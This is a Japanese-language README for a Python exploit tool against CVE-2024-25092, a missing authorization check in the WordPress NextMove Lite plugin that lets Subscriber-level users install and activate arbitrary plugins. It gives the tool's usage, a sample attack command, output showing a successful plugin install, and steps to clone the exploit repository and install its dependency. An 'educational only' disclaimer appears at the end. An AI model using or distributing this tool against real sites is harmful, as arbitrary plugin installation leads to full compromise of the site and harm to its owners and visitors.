
WordPress NextMove Liteプラグイン <= 2.17.0 - Subscriber+ 任意のプラグインインストール/有効化の脆弱性
CVE-2024-25092 は、WordPress NextMove Lite プラグイン (バージョン <= 2.17.0) に影響を与える高重大度の脆弱性です。この脆弱性により、認可チェックの欠如により、Subscriber以上のユーザーがWordPressサイト上で任意のプラグインをインストールおよび有効化できるようになります。
WordPress用のXLPlugins NextMove Liteプラグインには認可の欠落があり、Subscriberレベルの権限以上を持つ認証済みユーザーが任意のプラグインのインストールと有効化を実行できます。これにより、WordPressサイトが完全に侵害される可能性があります。
提供されるPythonスクリプトは、WordPressサイトにログインし、指定されたプラグインをインストールすることで、この脆弱性の悪用を自動化します。
usage: CVE-2024-25092.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit script for CVE-2024-25092 By Nxploit Khaled Alenazi.
options:
-h, --help このヘルプメッセージを表示して終了
-u URL, --url URL ターゲットURL
-un USERNAME, --username USERNAME
ユーザー名
-p PASSWORD, --password PASSWORD
パスワード
-pl PLUGIN, --plugin PLUGIN
インストールするプラグイン (デフォルト: cart-for-woocommerce)
python CVE-2024-25092.py -u http://example.com -un admin -p password -pl custom-plugin
Logged in successfully.
Site is vulnerable... Exploiting and uploading plugin
Plugin 'cart-for-woocommerce' installed and activated successfully.
requests ライブラリリポジトリをクローンします:
git clone https://github.com/Nxploited/CVE-2024-25092.git
cd CVE-2024-25092
必要なPythonパッケージをインストールします:
pip install requests
このスクリプトは教育目的のみを意図しています。責任を持って、明示的な許可を得たシステムでのみ使用してください。無断使用は違法であり、非倫理的です。